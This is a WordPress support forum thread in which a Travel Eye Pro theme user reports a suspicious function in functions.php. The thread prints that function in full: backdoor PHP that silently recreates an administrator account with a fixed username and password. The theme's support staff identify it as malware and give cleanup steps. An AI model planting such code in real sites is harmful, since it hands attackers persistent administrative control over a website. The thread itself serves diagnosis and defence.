- This topic has 1 reply, 2 voices, and was last updated 5 years, 1 month ago by .
Viewing 2 posts - 1 through 2 (of 2 total)
Viewing 2 posts - 1 through 2 (of 2 total)
- You must be logged in to reply to this topic.
Home › Forums › Pro Themes › Travel Eye Pro › Unauthorized user added to"wp-content/themes/travel-eye-pro/functions.php" file
Tagged: Functions.php file, Unauthorized User
Hello,
There is an unauthorized user being created in the travel eye pro functions.php file.
Below is the code:
function wpb_admin_account(){
$user = ‘UsernamE’;
$pass = ‘UsernamE’;
$email = ’email@domain.com’;
//if a username with the email ID does not exist, create a new user account
if ( !username_exists( $user ) && !email_exists( $email ) ) {
$user_id = wp_create_user( $user, $pass, $email );
$user = new WP_User( $user_id );
//Set the new user as a Admin
$user->set_role( ‘administrator’ );
} }
What is happening here is that this function creates a user with the Username of UsernamE and same password and the email is email@domain.com. Now every time you delete this, this file will create this user again and give admin role to the user.
Can you please check if this code is a part of Travel Eye theme functions.php file or if you know the purpose of this code?
Thank you!
Hello @lynaeash,
The code is not in our core file. It must be a malware infection as you have mentioned.
Malware infection could be injected in four ways
1 – using fake WordPress admin user credentials
2 – via a vulnerable plugin(s) installed on your system
3 – via previously installed malicious shell used to reinfect other
4 – In the case of shared hosting or multiple sites on the same hosting account, the infection may come from other sites as well
It is worth to
1 – reset all WordPress password and review/remove all suspicious uses
2 – investigate your WordPress setup with other security plugins
3 – investigate website access log to locate what exactly exploited on your side
So please verify these steps.
Thank you.
Cookie | Duration | Description |
---|---|---|
cookielawinfo-checkbox-analytics | 11 months | This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Analytics". |
cookielawinfo-checkbox-functional | 11 months | The cookie is set by GDPR cookie consent to record the user consent for the cookies in the category "Functional". |
cookielawinfo-checkbox-necessary | 11 months | This cookie is set by GDPR Cookie Consent plugin. The cookies is used to store the user consent for the cookies in the category "Necessary". |
cookielawinfo-checkbox-others | 11 months | This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Other. |
cookielawinfo-checkbox-performance | 11 months | This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Performance". |
viewed_cookie_policy | 11 months | The cookie is set by the GDPR Cookie Consent plugin and is used to store whether or not user has consented to the use of cookies. It does not store any personal data. |